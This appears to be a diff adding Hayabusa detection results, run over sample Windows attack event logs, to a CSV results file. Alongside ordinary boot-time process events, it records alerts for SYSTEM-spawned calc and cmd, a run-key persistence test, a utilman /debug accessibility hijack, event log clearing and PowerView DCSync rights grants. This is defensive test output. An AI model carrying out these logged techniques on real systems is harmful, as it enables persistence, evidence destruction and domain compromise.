+2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe""   :  Path: C:\Windows\PSEXESVC.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg  *  ""hello from run key""  :  Path: C:\Windows\System32\msg.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg *  ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
+2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
+2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
